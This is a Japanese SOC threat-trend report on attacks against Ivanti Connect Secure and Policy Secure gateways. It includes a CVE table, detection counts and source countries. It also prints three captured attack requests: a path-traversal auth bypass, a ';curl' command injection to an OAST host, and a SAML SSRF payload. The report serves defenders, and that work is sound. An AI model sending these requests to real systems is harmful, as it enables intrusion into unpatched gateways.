本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。

最新情報

2024.03.12

2024年2月度 MBSD-SOCの検知傾向トピックス

著者:MBSD-SOC

Ivanti Connect Secure(旧: Pulse Connect Secure)およびIvanti Policy Secureゲートウェイの脆弱性を狙った攻撃(1月分からの続報)

 今月は、先月のトピックで報告した「Ivanti Connect Secure(旧: Pulse Connect Secure)およびIvanti Policy Secureゲートウェイの脆弱性」を狙った攻撃が増加しました。

 1/10(米国時間)に、認証バイパスの脆弱性(CVE-2023-46805)とコマンドインジェクションの脆弱性(CVE-2024-21887)が公開されて以降、新たに複数の脆弱性が公開されております。また、各脆弱性において、PoC(概念実証コード)が公開されており、今後も攻撃が継続することが推測されるため、当該製品を使用されている場合は、早急に対策されることをお勧めします。

表. Ivanti社製品に関する脆弱性一覧(2024年1月以降)
公開日 PoC公開日 脆弱性

2024/01/10

2024/01/16

・認証バイパスの脆弱性(CVE-2023-46805)
・コマンドインジェクションの脆弱性(CVE-2024-21887)

2024/01/31

2024/02/02

・権限昇格の脆弱性(CVE-2024-21888)
・SSRFの脆弱性(CVE-2024-21893)

2024/02/08

2024/02/09

・XML外部エンティティインジェクションの脆弱性(CVE-2024-22024)

 下図は、2024年1月~2月における攻撃検知数の推移です。1月末の時点で攻撃数は減少傾向でしたが、2月に新たな脆弱性が公開されたことを受けて、再び攻撃数が増加しました。

図. 上記の脆弱性を狙った攻撃検知数の推移
グラフ.PNG

 下図は、攻撃元国と弊社SOCで検知した攻撃のパケットペイロードの一部です。攻撃元国では、先月に引き続きアメリカからの攻撃を多数観測していますが、新たにオランダとドイツからの攻撃が増加しています。

表. 上記の脆弱性を狙った攻撃元国 上位5件
# 2024年1月 2024年2月
1 アメリカ 78.4% オランダ 36.2%
2 日本 6.7% アメリカ 21.5%
3 台湾 5.8% ドイツ 21.1%
4 カナダ 5.7% カナダ 14.0%
5 イギリス 0.7% 台湾 2.7%

【検知例 ①】
認証を回避して、システム情報へのアクセスを試みた通信です。

図. CVE-2023-46805, CVE-2024-21887の脆弱性を狙った攻撃

GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
Host: www.example.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

【検知例 ②】
認証を回避して、curlコマンドを用いた外部サーバ(OASTサーバ)へのリクエストを試みた通信です。

図. CVE-2023-46805, CVE-2024-21887の脆弱性を狙った攻撃

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%xxxxxxx[.]oast[.]fun HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/9.1.2 Safari/602.4.8

【検知例 ③】
POSTボディにおいて、RetrievalMethod要素のURI属性に任意のURIを指定することで、外部URIへのリクエストを試みた通信です。

図. CVE-2024-21893の脆弱性を狙った攻撃

POST /dana-ws/saml20.ws HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 792
Accept-Encoding: gzip

<?xml version=""1.0"" encoding=""UTF-8""?>
<soap:Envelope xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">
<soap:Body>
<ds:Signature
xmlns:ds=""http://www.w3.org/2000/09/xmldsig#"">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm=""http://www.w3.org/2001/10/xml-exc-c14n#""/>
<ds:SignatureMethod Algorithm=""http://www.w3.org/2000/09/xmldsig#rsa-sha1""/>
</ds:SignedInfo>
<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xsi:schemaLocation=""http://www.w3.org/2000/09/xmldsig"" xmlns:ds=""http://www.w3.org/2000/09/xmldsig#"">
<ds:RetrievalMethod URI=""xxxxxx[.]oast[.]online""/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>

影響対象

  • Ivanti Connect Secure (旧: Pulse Connect Secure)
  • Ivanti Policy Secure (旧: Pulse Policy Secure)

対策方法

  • 詳細はIvanti社が提供している情報をご確認の上、最新のパッチや回避策の適用をご検討ください。

参考情報

マネージドサービス事業部
MBSD-SOC